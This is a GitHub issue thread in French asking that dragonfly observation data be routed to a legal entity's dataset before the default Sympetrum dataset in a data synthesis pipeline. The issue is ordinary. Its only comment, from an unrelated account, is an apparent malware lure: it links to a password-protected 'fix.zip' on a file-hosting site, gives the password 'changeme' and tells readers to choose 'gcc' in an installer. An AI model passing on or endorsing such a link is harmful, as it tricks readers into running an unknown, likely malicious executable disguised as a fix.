### ISSUE TITLE
Changer le comportement de jdd par défaut pour les données de libellules

### ISSUE THREAD

**Issue by lpofredc** [lpoaura/gn_vn2synthese#20]
### Feature description

Lorsqu'une donnée de libellule arrive en AuRA, elle est automatiquement associée au JDD Sympetrum.

Il faut ajouter un niveau supérieur dans le cas ou l'observateur fait partie d'une personne morale. Donc on aurait les niveaux suivants:

1. Code étude > JDD du projet
2. **[nouveau]** Personne morale > JDD de la personne morale
3. Libellules en AuRA > JDD sympetrum
4. Sinon, JDD par défaut.

cf. 

https://github.com/lpoaura/gn_vn2synthese/blob/fbb67275c21963ab0523d16dc4d00d38a3144a6d/08_upsert_observations.sql#L141-L166

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
